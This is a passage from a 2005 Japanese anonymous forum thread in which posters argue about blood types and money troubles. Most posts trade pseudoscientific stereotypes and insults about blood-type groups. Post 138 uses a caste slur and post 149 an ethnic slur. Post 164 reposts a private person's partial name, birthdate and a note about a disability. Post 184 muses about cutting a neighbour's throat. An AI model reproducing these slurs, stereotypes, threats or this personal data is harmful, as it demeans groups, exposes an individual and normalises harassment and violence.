>>112はA型の>>108とB型の>>109のやり取りが読み取れてない。
はっきりいって関係のないO型を出すこと自体気がふれている。
勘違いもはなはだしい以前にちゃんと読解力をつけよう!
ひょっとして国語の成績オール1だとか・・・?
ちゃんと日本語読めるようにしてから書き込みお願いします。

126 :マドモアゼル名無しさん:2005/04/26(火) 00:02:24 ID:+DtsjSKS
騒音の犯人はB型というのは完全な嘘です。

127 :マドモアゼル名無しさん:2005/04/26(火) 00:04:11 ID:mgepVbEA
作り話か誠か証明できもしない話を粘着質にでっち上げ続けるOは屑以下だということがよくわかった。

128 :マドモアゼル名無しさん:2005/04/26(火) 00:06:29 ID:3NGHpFg7
でっちあげるのはA型ー

129 :マドモアゼル名無しさん:2005/04/26(火) 00:07:15 ID:mgepVbEA
たとえばO型は自分の借金を〜ってスレ上げたことあるかな?

130 :マドモアゼル名無しさん:2005/04/26(火) 02:01:09 ID:xtuhKXDM
すぐでっちあげるのはA型だろ
まちがってる情報を何度も見たぞ

131 :マドモアゼル名無しさん:2005/04/26(火) 02:06:14 ID:mgepVbEA
以前のA叩きの壮絶さを忘れたか?

132 :マドモアゼル名無しさん:2005/04/26(火) 02:14:09 ID:xtuhKXDM
つーかおまえは関係ないスレ来るなよ
A型なんだから

133 :マドモアゼル名無しさん:2005/04/26(火) 02:21:59 ID:mgepVbEA
Oの冷酷さ丸出しだな。どこがおおらかなんだ

134 :マドモアゼル名無しさん:2005/04/26(火) 02:55:34 ID:xtuhKXDM
意味わからん

135 :マドモアゼル名無しさん:2005/04/26(火) 05:55:04 ID:Yit2H1bV
A型ってどちらかっていうとカネヅルじゃない?。たかりにも最適。見栄っぱりだから。
キャッシュディスペンサーって感じ〜♪。

136 :マドモアゼル名無しさん:2005/04/26(火) 09:11:57 ID:ZaHzEQ1Q
↑本音炸裂

137 :マドモアゼル名無しさん:2005/04/26(火) 21:10:02 ID:YwWkYgsh
>>134
そうやってどんどん墓穴掘ってくれよ(・∀・)

138 :マドモアゼル名無しさん:2005/04/27(水) 08:44:24 ID:ZDy67tG1
>>125みたいにねちねち言うやつは騒音婆の親戚だな。

>>125のjsxNpIUAは、一般市民に恨みを持った奈良出身被差別民。



139 :マドモアゼル名無しさん:2005/04/27(水) 08:58:33 ID:GBJ1YB/2
>>125おまえAじゃないだろ?AがO叩いてキレてるからO型か?

大体Aなら、O叩いたヤツより>>1を叩くよな?
自分はA型だと必死に言い訳してるのも怪しいし。
O型はA型を名乗って格を落とすのやめて欲しい。

140 :マドモアゼル名無しさん:2005/04/27(水) 09:08:01 ID:ZDy67tG1
>>125>>111をB型だと思ってるみたいだけど
B型は韓国で嫌われてるのスレで同じIDの書き込み見つけたんだけど・・・

2005/04/25(月) 13:05:21 ID:02w20LsM
B型もO型も基本は一緒。あいつらうざい。
でもリアルではO型とは仲いいフリをしておく。

どう考えても>>111=A型でしょ。

141 :マドモアゼル名無しさん:2005/04/27(水) 13:00:39 ID:x6wVjw0i
>>111はO型の自作自演か、あるいはB型かひょっとしたらAB型
かもしれない(確率はきわめて低いが)が、A型ではないことは
確実。なんでみんなそんなこともよめないの?

それから>>125はどう見てもA型でしょう。
B型の自作自演ってこともあるかもしれないが、
O型でないことは確実。

みんな前後の書き込みの内容の流れをよく読みとろうね。

142 :マドモアゼル名無しさん:2005/04/27(水) 13:30:29 ID:o86zjCEp
>>1そんな図々しいことできるのはO型ぐらいだろ
そもそもA型は借金はつくらないよ 堅実だから馬鹿みたいに(O型)ギャンブルなどはしないし

143 :マドモアゼル名無しさん:2005/04/27(水) 13:37:52 ID:6ze7GAwr
ただのイメージでの話しだな AでもOでもいろいろいるだろ
A型はくだらないイメージに左右されるみたいだな
真実を見ようとせずただのイメージで人を決め付ける

144 :マドモアゼル名無しさん:2005/04/27(水) 15:07:58 ID:5dqoOzOE
A型全然堅実じゃないんだけど浪費家な上、人に横取りされる苦労性。

145 :マドモアゼル名無しさん:2005/04/27(水) 16:04:40 ID:x6wVjw0i
>>142
ふ〜ん、O型にいじめられたんだ。
かわいそうに・・・。

146 :マドモアゼル名無しさん:2005/04/27(水) 17:09:37 ID:pKJvqTCk
>>1そんな図々しいことができるのはB型だけだろw
A型はほとんど借金は作らない。堅実だからあほ(B型)みたいにギャンブルはしないからな

147 :マドモアゼル名無しさん:2005/04/27(水) 17:24:46 ID:s9j3LBMe
1が仮に本当だとして一回や二回言いたいのはわかるが。そこまで粘着質で攻撃的で執念深く猜疑心の強い奴が騙されるものかね?はっきり言って自称は全部信用できない。
芸能人とか著名人の犯罪者の現状でも見てみろ。それすら大元で嘘かもしれないがな。言いたいことはあまり必死になるなってことだ。

148 :マドモアゼル名無しさん:2005/04/27(水) 18:01:11 ID:ZDy67tG1
>>141
流れを読み取った。x6wVjw0i=jsxNpIUAだ。


149 :マドモアゼル名無しさん:2005/04/27(水) 18:03:28 ID:ZDy67tG1
↑間違えた
x6wVjw0i=jsxNpIUA=02w20LsM=O型だ。
つまりA型を名乗って自作自演する。チャンコロ


150 :マドモアゼル名無しさん:2005/04/27(水) 18:28:50 ID:knzXZxoJ
Aでもいろいろいるから分んない。
育ちの問題だよ。
竹内ユウコみたいなAはケチっぽいけど
鈴木さりなみたいなAは浪費家っぽいし
Bでも神田うのみたいなのは浪費家ぽいけど
国中涼子みたいなBはコツコツ貯めてそう。

151 :マドモアゼル名無しさん:2005/04/27(水) 18:39:08 ID:ZDy67tG1
>>150神田うのはO型ですよ。

ソースの公式HP
ttp://www.spacecraft.co.jp/uno/profile.html


152 :マドモアゼル名無しさん:2005/04/27(水) 20:14:14 ID:n2xjEu86
Aって、こういうこと(金銭トラブル)でもしない限り、相手にもされないから、
こうするより仕方が無いんですねw 表舞台では能力不足で存在感がないから、
犯罪でもして名を残したいという願望ですね

153 : ◆USAMANXP9Y :2005/04/27(水) 20:16:54 ID:eOyNgLJt

      ,一-、
     / ̄ l |   / ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄
    ■■-っ < んなーこたーない
    ´∀`/    \__________
   __/|Y/\
 Ё|__ | /  |
     | У  |


154 :マドモアゼル名無しさん:2005/04/27(水) 20:28:32 ID:x6wVjw0i
>>149
あのう>>141はA型なんですけど、
仮にO型ならこのような内容の書き込みは絶対にしないと思うのですが・・・。
まだAB型やB型と勘違いするのなら、わからないこともないけれど、
O型はないでしょう。絶対に。
もっと前後の空気読んでくださいよ。
というよりかは、もっと読解力つけてください。
>>148>>149はもう一度「あいうえお」から国語の勉強してください。
もう遅いかもしれないけど・・・。
このバカさ加減は死なんとなおらないかもねw

155 :マドモアゼル名無しさん:2005/04/27(水) 21:08:54 ID:QBAMtdya
>>142
金借りてしればっくれてる奴Oがこれ。
金も返さず馬券とか買ってた。
もともと金銭感覚が違うみたいね。。。


156 :マドモアゼル名無しさん:2005/04/27(水) 21:17:02 ID:n2xjEu86
この板を見るに(成りすましも含め)、

Aは万遍なく他血から本気で叩かれ、
Oを本気で叩くのはAだけ、
Bを本気で叩くのはAだけ、
ABは、ほとんど叩かれていない

と思います。

157 :マドモアゼル名無しさん:2005/04/27(水) 21:21:09 ID:9j/05pil
     ∧_∧                     ∧_∧
     ( ´∀`)                    (´∀` )
    ⊂ 豪州 ハ                / 欧州 ⊃
    ( ̄)  U. ∧_∧        ∧_∧ U.   ( ̄)     
      ̄(__).( ´∀`)      ...(´∀` ∩.(__)  ̄    
         ⊂ 日本 つ..∧_∧ ⊂ 北米 )    
          / ゝ 〉 ( ´∀` )  ,( ヽノ    
        . (_(__) (A型ノつ し(_)     
               /ヽ ヽl⌒l
               (_ノ∪_)


     【我ら、先進国地域なり!他血、何するものぞ!】


158 :マドモアゼル名無しさん:2005/04/27(水) 21:21:15 ID:77tG2iZX
叩きって実は1〜2人程度の仕業だったりして・・・・

159 :マドモアゼル名無しさん:2005/04/27(水) 21:33:13 ID:Ayh0ymq1
>>156
成りすましを含めって、どの程度成りすましなのかもわからんのに。


160 :マドモアゼル名無しさん:2005/04/27(水) 21:57:24 ID:ZDy67tG1
>>154は成りすましのOかBでしょう。
仮にAならわざわざAだと名乗ってAを叩く方向に持っていかないですからね。
そういう捏造だけは本当にやめて欲しい。

161 :マドモアゼル名無しさん:2005/04/27(水) 22:02:15 ID:Ayh0ymq1
何がなんだかわけわかめー
(@o@)

162 :マドモアゼル名無しさん:2005/04/27(水) 22:02:37 ID:x6wVjw0i
>>160
で、なぜ俺がBかOなわけ?
A型だからこのような書き込みをしているわけで、
仮に俺がB型やO型ならば、
死んでも>>154のような書き込みはしないよ。

あてずっぽで人の血液型を決め付けるのやめてくれるかな?
もっと洞察力を磨いてくれ!!

163 :マドモアゼル名無しさん:2005/04/27(水) 22:05:29 ID:Ayh0ymq1
まぁ、もちつけ。

164 :マドモアゼル名無しさん:2005/04/27(水) 22:26:35 ID:ZDy67tG1
>>162
[血液型叩き、中傷はいい加減にしろよ!]スレの859の書き込みと同じIDですね。
あちらのスレではA型を叩いてましたね?
あなたのコピペに個人情報があったので一部削除してコピペします。


859 名前:マドモアゼル名無しさん :2005/04/27(水) 22:15:49 ID:x6wVjw0i
追加で・・・、
米谷喜夫っていう血ヲタおじさんの詳細プロフィールね

米○喜夫
生年月日・昭和45年6月12日生まれ(双子座)
住所・
電話番号・
携帯電話・
血液型・A型
その他・脳神経に多少の障害あり。




おまいがA型じゃなくてよかった。

165 :名無し:2005/04/27(水) 22:29:12 ID:3cO86RSs
うはwwwww近年稀に見る糞スレだなwwwwwwwwwwwヤバス

166 :マドモアゼル名無しさん:2005/04/27(水) 22:33:06 ID:Ayh0ymq1
そーだよー

167 :マドモアゼル名無しさん:2005/04/27(水) 23:44:27 ID:DbVUWpQ5
>>99
占いを信じて人にお金を貸す
お前の方がよっぽど頭弱いだろうな。。。

168 :マドモアゼル名無しさん:2005/04/28(木) 00:04:26 ID:9BlMs+Oj
借金話は他でヤレ。血と関係ねーし。でFA

169 :マドモアゼル名無しさん:2005/04/28(木) 01:09:37 ID:CoOoyLLs
( ´_ゝ`)フーン
Aって一括りにしてるところがアイタタタ。頑張ってお金取り返してね

byA

170 :マドモアゼル名無しさん:2005/04/28(木) 18:03:54 ID:ONVFQy4s
>>164=O型

171 :あぼーん:あぼーん
あぼーん

172 :マドモアゼル名無しさん:2005/04/28(木) 19:56:54 ID:ONVFQy4s
もっと詳しく言うと>>164は幼いころA型にいじめられたO型。
A型への嫉妬心丸出しの典型的な低脳O。
自分ではA型を成りすましているつもりだが、
傍目から見ると、バレバレ。
自分なりに完璧にA型と思われるよう下手な嘘をつく。

173 :マドモアゼル名無しさん:2005/04/29(金) 00:37:23 ID:GGuR9fqL
ONVFQy4s=x6wVjw0i=jsxNpIUA=両親B型のO型だな。
騒音おばさんの血統と同じ組み合わせだね。
この血統って最上級の粘着質。



174 :マドモアゼル名無しさん:2005/04/29(金) 06:56:13 ID:518711wR
やっぱりこの板みてるとA型嫌いになる。
世間では評判の悪くないのにこの板の醜いカキコと言ったら…。自分が自我自尊してるA型の評判落としてるだけだぞ!。
やはり、A型=自滅型。

175 :マドモアゼル名無しさん:2005/04/29(金) 08:23:40 ID:pTbuSpXh
>>173>>164
自作自演乙カレー!
君、O型だってバレバレだよ。
うまいことA型に成りすましているようだけど、あんたの
頭のレベルじゃ、見透かされているねw

まあ、あんたがAじゃないってことが俺にとっては救いだね。
でも、Aを名乗る低脳Oって、ほかのOにとっては
はなはだ迷惑だね。


176 :マドモアゼル名無しさん:2005/04/29(金) 08:41:43 ID:pTbuSpXh
A型・・・>>80>>100>>125>>141>>145>>154

177 :マドモアゼル名無しさん:2005/04/29(金) 08:42:41 ID:pTbuSpXh
A型・・・>>162>>170>>171>>172>>175

178 :マドモアゼル名無しさん:2005/04/29(金) 08:43:58 ID:pTbuSpXh
O型・・・>>105>>111>>148>>149>>160>>164>>173

O型くん、自作自演乙カレー!

179 :マドモアゼル名無しさん:2005/04/29(金) 13:26:24 ID:fCUlf8be
↑なんかしつこいやついるな〜。
A型偽ってるBかO?

180 :マドモアゼル名無しさん:2005/04/29(金) 13:38:01 ID:Q144/fE4
     ∧_∧                     ∧_∧
     ( ´∀`)                    (´∀` )
    ⊂ 豪州 ハ                / 欧州 ⊃
    ( ̄)  U. ∧_∧        ∧_∧ U.   ( ̄)     
      ̄(__).( ´∀`)      ...(´∀` ∩.(__)  ̄    
         ⊂ 日本 つ..∧_∧ ⊂ 北米 )    
          / ゝ 〉 ( ´∀` )  ,( ヽノ    
        . (_(__) (A型ノつ し(_)     
               /ヽ ヽl⌒l
               (_ノ∪_)


     【我ら先進国家、A型多数派地域なり!他血、何するものぞ!】


181 :マドモアゼル名無しさん:2005/04/29(金) 14:13:21 ID:pTbuSpXh
>>179
正しくは、
B型かO型偽っているA型?
と、いいたいのでしょ?
日本語は正しく使おうね。

182 :マドモアゼル名無しさん:2005/04/29(金) 14:16:20 ID:qnoOHdfO
一生ループして言い合ってれば。
ツマンナイから下でやっててよ。

183 :マドモアゼル名無しさん:2005/04/29(金) 14:34:41 ID:t9ENe3S6


184 :マドモアゼル名無しさん:2005/04/29(金) 14:50:36 ID:Fj/269ub
A型って他人の人生に干渉してくる
隣のババアがそう
おれが部屋で音楽聞き始めたらゴスンゴスン
うるさくしはじめる
音なんか漏れてね-のに
ほんとに腹立つから乗り込んで首切ってやろうかな
そのババアほんとにつまんない奴なんだぜ?

185 :マドモアゼル名無しさん:2005/04/29(金) 15:15:21 ID:Fj/269ub
おれが窓開けてじ〜っと見てやったら急におとなしくなりやがったぜ
あのA型糞ババア
まるで妖怪みたいな奴だ
誰にも見られていないとたかをくくるとどんな
悪いことでもできます
だけど見つめられると恐いんですかよ

186 :マドモアゼル名無しさん:2005/04/29(金) 15:37:23 ID:VfElZsTp
>>184-185
おお怖w










お前がなー

187 :マドモアゼル名無しさん:2005/04/29(金) 21:33:49 ID:GGuR9fqL
>>175-178のpTbuSpXhは粘着キモイ。
>>184-185 >>186に禿げ同

188 :マドモアゼル名無しさん:2005/04/30(土) 15:13:22 ID:IRv2/8OW
>>175>>176>>177>>178
だってA型だから仕方ないんじゃないの?

189 :マドモアゼル名無しさん:2005/04/30(土) 20:57:36 ID:sF+DM7pP
>>175>>176>>177>>178
A型と血液型偽ってキモイ事する陰険Oだと思われ・・・

190 :◆Pao//ammgA :2005/04/30(土) 20:59:04 ID:Co5vBQFj
いちいちあげんな、タコが

191 :マドモアゼル名無しさん:2005/04/30(土) 21:53:36 ID:IRv2/8OW
>>175>>176>>177>>178
A型鬱陶しいぞ!

>>189
O型の自作自演乙カレー!

192 :マドモアゼル名無しさん:2005/04/30(土) 21:55:28 ID:0ahYXt7a
だからあげんなよ。
救いようがねぇな。

193 :◆Pao//ammgA :2005/04/30(土) 21:57:36 ID:Co5vBQFj
それが守ってちゃん。

194 :マドモアゼル名無しさん:2005/04/30(土) 21:57:48 ID:IRv2/8OW
>>189
いい加減にA型に成りすまして、A型にからんでくるの
やめたら。
そんなにA型に相手になってほしいのか?
まあ、お前みたいな低脳なOを相手にするほど
A型はバカじゃないよ。

195 :◆Pao//ammgA :2005/04/30(土) 22:00:13 ID:Co5vBQFj
いちいちあげんな、サルが

196 :マドモアゼル名無しさん:2005/04/30(土) 22:01:11 ID:+78tbDkL
A型って責任転換するんだなw

197 :◆Pao//ammgA :2005/04/30(土) 22:04:34 ID:Co5vBQFj
お前がな

198 :マドモアゼル名無しさん:2005/04/30(土) 22:55:51 ID:zIsFQplN
>A型って他人の人生に干渉してくる

199 :マドモアゼル名無しさん:2005/04/30(土) 23:01:04 ID:jVqgUnKL
A型救いようがないなw

200 :◆Pao//ammgA :2005/04/30(土) 23:04:59 ID:Co5vBQFj
お前がな

201 :マドモアゼル名無しさん:2005/04/30(土) 23:07:57 ID:fEoDbAPm
ほっとけばいいんだよ。頭ヘンになってんだから。
かわいそうに・・

202 :マドモアゼル名無しさん:2005/04/30(土) 23:09:43 ID:QzHv+fX9
>>200
おまえがな〜〜!!

203 :マドモアゼル名無しさん:2005/05/01(日) 00:17:04 ID:Fw2NuXNj
>>202
>>200の包は救いようが無いに禿同。

204 :マドモアゼル名無しさん:2005/05/01(日) 05:33:11 ID:9Z91aAvq
>>1
うはwwwwwワロスwwwwwwwwうぇっぇwwwwww


205 :マドモアゼル名無しさん:2005/05/03(火) 23:05:22 ID:GEJgutFp
A型ババアは、70を過ぎると、傲慢なブスばっかり。人に迷惑かけても、
旅の恥はかき捨て(旅でもないのに)の根性。自意識過剰の悪人

206 :マドモアゼル名無しさん:2005/05/04(水) 06:38:49 ID:hlCkuyB5
>>175>>176>>177>>178
やっぱOだった。

207 :マドモアゼル名無しさん:2005/05/04(水) 08:41:25 ID:EvafAQDG
A型の自意識過剰はある意味おめでたいし利用出来る。お前には自分が必要なんだと勝手に思い込む。
カネづる、パパに最適な血液型。見栄っぱりなので表面上はカネを惜しみなく出す。

208 :マドモアゼル名無しさん:2005/05/04(水) 09:39:27 ID:z4oK0PBk
金にだらしないのはO♀とA♂に決定!ただし自営の人間ね。

209 :◆Pao//ammgA :2005/05/04(水) 09:45:10 ID:FWXgIvu6
炭坑マンの両親もな

210 :マドモアゼル名無しさん:2005/05/04(水) 09:45:43 ID:AtGO5G8y
私から踏み倒していったのはO♂のリーマン。
情に訴えるのは超一流だったね。

211 :◆Pao//ammgA :2005/05/04(水) 09:47:38 ID:FWXgIvu6
炭坑一家にはいない血液型だね

212 :マドモアゼル名無しさん:2005/05/04(水) 09:49:33 ID:AtGO5G8y
炭坑マンってなぁに?

213 :◆Pao//ammgA :2005/05/04(水) 09:53:46 ID:FWXgIvu6
>>212
ボクがこの掲示板で性格研究の対象としている南の荒らし四天王の一人です。

214 :マドモアゼル名無しさん:2005/05/04(水) 10:35:28 ID:a7bBcTwK
>>208
A♂はワシからも50万円だまし取った、いてこましたろか、ブォケ!

215 :マドモアゼル名無しさん:2005/05/04(水) 10:43:21 ID:xsHTvD8U
いてこましても全然かまわないけど上げないでよ。

216 :マドモアゼル名無しさん:2005/05/04(水) 10:50:14 ID:hlCkuyB5
関西人ならO♂が最悪。

217 :マドモアゼル名無しさん:2005/05/04(水) 11:16:47 ID:+I2rb8Ft
スレを繰り返し、読んでみた。
自作自演とかも含めて、
だいたい血液型わかったぞ。
まず、
>>175>>176>>177>>178>>188>>191>>194はどう見ても
A型以外にないだろう。

218 :マドモアゼル名無しさん:2005/05/04(水) 11:18:39 ID:+I2rb8Ft
続き
>>187>>189>>206はO型の自作自演。

特に>>206はもう一度
スレを読み直してから書き込みしろ!
多分、逆のことが言いたいのだと思うよ。

219 :マドモアゼル名無しさん:2005/05/04(水) 11:22:43 ID:hlCkuyB5
>>217>>218>>175-178>>188>>191>>194だよね?
ageくせも同じだし、そんなに前から読み返すなんて当事者以外考えられんよ。
連休の朝から自作自演乙カレー

220 :マドモアゼル名無しさん:2005/05/04(水) 11:34:27 ID:1H3MNuc6
I2rb8Ftとかいうヤツは放置しとけ。
ずっと前からいる自称A型の粘着厨なんだから。
A型叩き板に現れて、A型を名乗って、アラシて去る。
余程A型にコンプレックスがあるんだろうよ。

221 :マドモアゼル名無しさん:2005/05/04(水) 11:44:44 ID:hlCkuyB5
>>220
そうだったんだ了解。

+I2rb8Ftは【自称】A型を妄想で存分に味わってくれ。
現実ではA型になれないんだから。( ´,_ゝ`)プッ

222 :マトモジャナイゼルカマオさん:2005/05/04(水) 11:50:53 ID:zHtyuY9A
A型は借金を多血におしつけるって、多血だろうが

同血だろうが押しつけてすむものなら、いくらでも

押しつけてやる、エイエイグイグイ!!!

223 :マドモアゼル名無しさん:2005/05/04(水) 11:53:16 ID:xiqrcUCS
借金餅の方すか?

224 :マトモジャナイゼルカマオさん:2005/05/04(水) 12:00:03 ID:zHtyuY9A
昔は収入も多かったけど借金もおおかった。

いくらあるか解らないくらい・・・

デモ今は借金もないけど収入も無い

どっちが幸せなんだろう?????

225 :マドモアゼル名無しさん:2005/05/04(水) 12:03:40 ID:xiqrcUCS
俺踏み倒された方なんだけど
そいつを見てた感想だと、ビンボでも借金無い方がマシじゃないかな。
幸せじゃないだろうけどね・・

226 :マドモアゼル名無しさん:2005/05/04(水) 12:41:11 ID:hlCkuyB5
Aは要領が悪いから損だと思う。

ちなみに中高時代の漏れのパターン・・・

友達(O型)がお金が無いという→俺の財布を見たら8000円あったので居酒屋で夕飯おごる。
→その後友達(O型)の財布に20000円発見!!→今月の服を買う金なので無いのと同じだと主張される。
漏れは洋服を買う金を入れての8000円でおごってるんだが・・・と思う。

現在
その友達(O型)・・・20代半ばでマイベンツ持ち
漏れ・・・・・・・・・・・・20代半ばで中古チャリンコのみ orz     


227 :マドモアゼル名無しさん:2005/05/04(水) 12:51:56 ID:dlchWvYm
何にせよ金が絡むとロクな事ねーよ。
借りたもん勝ちだからな。
まぁ、中高時代と現在はあんま関係ねーとは思うが



228 :マドモアゼル名無しさん:2005/05/04(水) 16:49:33 ID:+I2rb8Ft
1H3MNuc6とかいうやつは放置しとけ。
すっと前からいる自称A型の粘着厨なんだから。
A型叩き板に現れて、A型を名乗ってアラシて去る。
よほどA型にコンプレックスがあるんだろうよ。

229 : ◆USAMANXP9Y :2005/05/04(水) 16:51:28 ID:d/jyo9o4

    / ̄ ̄ ̄ ̄\,,      /         \
   / −、 −、__ ヽ    /  ______  \
   | |  ・|・  |   |  |   /  /  ─ 、 ─ 、 ヽ \  ヽ
   | `-●−′  |___/   | /  |  ・|・  |──|    |
   | 三 | 三    6 l   |/   ` - c`─ ′   ||   |
.   ヽ (_|___  ,-′   |    (____     |  l
     ヽ ___ /ヽ     ヽ            / /
     / |/\/ l ^ヽ    \          / /
     | |      |  |     l━━(t)━━━━┥


230 :マドモアゼル名無しさん:2005/05/04(水) 16:53:05 ID:p2+gNqHC
確かにA型はずるいよね。
ずる賢い。コロコロ発言変えて責任逃ればかり。
上のA型の兄弟はほとんどうちの金使い込みして
今は遊んで暮らしてる。
オウムの麻原じゃないけど、どんなウソでもつき通せば
本当になると思ってる人種。
たとえウソがばれても平気で開き直れるから真面目に
対応しようとすると馬鹿を見る。
A型が多い日本の特徴なんだろうか・・

231 :マドモアゼル名無しさん:2005/05/04(水) 16:53:29 ID:+I2rb8Ft
hlCkuyB5は【自称】A型を妄想で存分に味わってくれ。
現実ではA型になれないんだから。プッ)





















うんこブリブリ

232 :マドモアゼル名無しさん:2005/05/04(水) 16:53:56 ID:Nb+haDhg
(゚Д゚)y─┛~~

233 :マドモアゼル名無しさん:2005/05/04(水) 17:07:31 ID:+I2rb8Ft
hlCkuyB5曰く
>>218>>217>>175>>176>>177>>178>>188>>191>>194

だいたいスレの流れからして、どれがホンモノで、偽者かぐらい
読み取れないのか?お前の頭脳では無理だろな。プッ)
お前が偽Aであることぐらい100も承知なんだ。
いい加減A型を装って、A叩き板でA型を叩くのやめろよ。


234 :マドモアゼル名無しさん:2005/05/04(水) 17:11:51 ID:Nb+haDhg
どっちもメーワクだからヤメヤ(゚Д゚)y─┛~~

235 :マドモアゼル名無しさん:2005/05/04(水) 17:11:52 ID:+I2rb8Ft
>>233だけどさぁ、
本当に一連の偽Aムカツク。
そんなにA型が羨ましいのか?

236 :マトモジャナイゼルカマオさん:2005/05/04(水) 17:16:34 ID:zHtyuY9A
あたしゃ世の中で一番嫌いな言葉

なになにちゃーん何々があるから

なになにしないと損よー!

損をする・・・この言葉

世の中で一番チープで一番嫌い!!!

237 :マドモアゼル名無しさん:2005/05/04(水) 17:22:07 ID:BHu0sQxh
良かったな。


238 :マドモアゼル名無しさん:2005/05/04(水) 21:12:23 ID:hlCkuyB5
>>235
わかったわかった。んじゃ+I2rb8Ft=A型でいいよ。
いちいちageてまで自己主張するなんてさすがAだよ。


これでいいだろ?もう迷惑だからやめれ。

239 :マドモアゼル名無しさん:2005/05/04(水) 21:24:14 ID:z4oK0PBk
O型は金のためたら頭も下げるし、その場限りの嘘も平気でつける演技派。A型は借金しててもプライド高いから頭下げない。これがまたムカツク。自分の立場わかっとるんか〜コンニャロッ!←自営の人ね。

240 : ◆USAMANXP9Y :2005/05/04(水) 21:27:00 ID:d/jyo9o4
( ´д)ヒソ(´д`)ヒソ(д` )


241 :マドモアゼル名無しさん:2005/05/04(水) 21:30:08 ID:mTf8f2Is
ヒソヒソ( ゚д゚)ヤダァ(゚д゚ )ネェ、キイタ?( ゚д゚)オクサン(゚д゚ )アラヤダワァ

242 :マドモアゼル名無しさん:2005/05/05(木) 19:36:52 ID:G56Ua8P/
この板を見るに(成りすましも含め)、

Aは万遍なく他血から本気で嫌われ、
Oを本気で嫌うのはAだけ、
Bを本気で嫌うのはAだけ、
ABは、ほとんど嫌われていない

と思います。








243 :マドモアゼル名無しさん:2005/05/05(木) 22:13:26 ID:PBg4iMQe
A型嫌われてるよァ ,、 ,、 (´∀`) ハ /\









or2

244 :マドモアゼル名無しさん:2005/05/05(木) 22:58:46 ID:74mhWBVR
私はA♀だけどA♂大嫌い。イライラする。A型♀は友達一人もいないからわからないけど。きずけば周りは男女Bだらけ、楽しいよ。気を使わなくて良いし。とにかくA嫌い!

245 :◆Pao//ammgA :2005/05/05(木) 23:00:48 ID:hOcilA6M
そんなに自分を責めないで

246 :マドモアゼル名無しさん:2005/05/05(木) 23:01:01 ID:sNTZUlQD
どうでもいいからクソスレ上げんなタコ


247 :マドモアゼル名無しさん:2005/05/05(木) 23:05:59 ID:Zuvxg/Ko
A型が2chに増えてから、馴れ合いだらけのつまらない掲示板になったね。
A型は2chから出ていってほしいね。

248 :マドモアゼル名無しさん:2005/05/05(木) 23:07:16 ID:6OD5HCfH
非A型の性格の悪さを証明せいてくれてありがとさn

249 :マドモアゼル名無しさん:2005/05/05(木) 23:14:58 ID:ha8FBWUR
居なくなったらつまんないんじゃないのか?
叩く対象が無くなって。
あぁそうしたらまた違う奴を祭り上げるのか

250 :マドモアゼル名無しさん:2005/05/05(木) 23:48:12 ID:41uP/hLC
やっぱり根が嫌な人だと思う とりあえず文句が多い 意地が悪い
その場ではわからないけどあとで思い返すとムカムカするようなことを言う
自分では完璧だとおもっているようだけどそう思っている人はいない
重要なのはそこじゃないって人が多い

251 :マドモアゼル名無しさん:2005/05/05(木) 23:59:55 ID:WsobGKPN
>>250
文句言う、意地悪、あいつちょっとムカつくとこある〜
って自分が誰かに思われてるかも・・って考えた事ないの?
俺はそんな完璧な人間じゃないんでね。
誰も責められないんだが。
そのかわりひとくくりに叩かれるのも御免だね。



252 :マドモアゼル名無しさん:2005/05/06(金) 10:11:41 ID:wUt8R4Jq
この板での力関係
A・・・ほとんど誰からも嫌われていない
B・・・O型から嫌われている
O・・・B型から嫌われている
AB・・・不明

253 :マドモアゼル名無しさん:2005/05/06(金) 10:54:19 ID:Wu77Rl63
>>252
この板を見るに(成りすましも含め)、

Aは万遍なく他血から本気で嫌われ、
Oを本気で嫌うのはAだけ、
Bを本気で嫌うのはAだけ、
ABは、ほとんど嫌われていない

これ客観的事実。感情論でも何でもない。
喪前、文章読解力ある?ある人なら分かる
はずだ。それとも現実から眼をそむけてい
るのか、虚勢を張っているのか?それとも
単なる悔し紛れか?

そもそも、Aの悪口が多いということはA
自身が指摘し、憤慨していたことだ










254 :マドモアゼル名無しさん:2005/05/06(金) 11:31:49 ID:bOSjT7kg
ずいぶん必死に熱弁振るってるけど
コピペ貼った方?w
2chの世界の中で感情論では無いとか言われてもね。
ほんとにクダラナイ。
どの血液型も馬鹿みたい。


255 :マドモアゼル名無しさん:2005/05/06(金) 15:57:18 ID:DV+PUbrT
個人的意見を吐き捨てそれを押し付けるのはどうかな。参考資料にはなるがあくまで第3者が評価するものであって君が決め付けることではない

256 :マドモアゼル名無しさん:2005/05/06(金) 16:16:32 ID:P0mXoYu+
こんなトコに来て、何学者みたいに語ってるんだか…

257 :マドモアゼル名無しさん:2005/05/06(金) 17:23:01 ID:wUt8R4Jq
>>253
叩かれてるよね、A型。
と言うよりかは、A型に成りすまして
バカなことを書きまくり、A型の評価をsageようとした魂胆の香具師
が何人かいるよね、ここの板って。
これはAに嫉妬してるってことの裏返しか?

258 :マドモアゼル名無しさん:2005/05/06(金) 17:29:08 ID:/AVUsMEF
>>253
お前の文章を理解するには文章読解力より妄想読解力が必要なようだが。

259 :マドモアゼル名無しさん:2005/05/06(金) 17:29:41 ID:9PjYFEXz
http://www.meken.med.kyushu-u.ac.jp/~tosakai/BloodType1Error.html

↑これ読むと能見の馬鹿さ加減がよくわかるよ





260 :マドモアゼル名無しさん:2005/05/06(金) 17:42:46 ID:/AVUsMEF
>>252
お前、それは妄想だろう・・・

261 :マドモアゼル名無しさん:2005/05/06(金) 18:01:52 ID:FhNXJTvl
>>231みたいな偽Aが評判を落としてるんだろ?
リアルではAは好かれてるよ。


262 ::2005/05/06(金) 18:07:20 ID:ezcO6oqD
なんか擦り付け合いにあってきたな。

263 :マドモアゼル名無しさん:2005/05/06(金) 18:16:59 ID:P0mXoYu+
万人から好かれる奴なんていない。
誰だって絶対どこかで誰かに「アイツ嫌〜」って思われてるのに。
何でこの板の血ヲタはそんなに偉そうに語れるんだろ。

264 :マドモアゼル名無しさん:2005/05/06(金) 20:48:51 ID:wUt8R4Jq
>>261
禿同!

265 :マドモアゼル名無しさん:2005/05/06(金) 20:55:26 ID:WrslgiiN
好かれてても嫌われてても構わんが、赤の他人に叩かれる筋合いもない。

266 :マドモアゼル名無しさん:2005/05/06(金) 21:20:16 ID:FhNXJTvl
>>264
大体A型は[うんこぶりぶり]なんて
しょうもない書き込みしないからな。

267 :◆Pao//ammgA :2005/05/06(金) 21:22:01 ID:uWxgaPGQ
そうだね。
たぶんするとしたら、うんこひりひり

268 :マドモアゼル名無しさん:2005/05/06(金) 21:24:35 ID:WrslgiiN
いじめっこー( -ェ-)

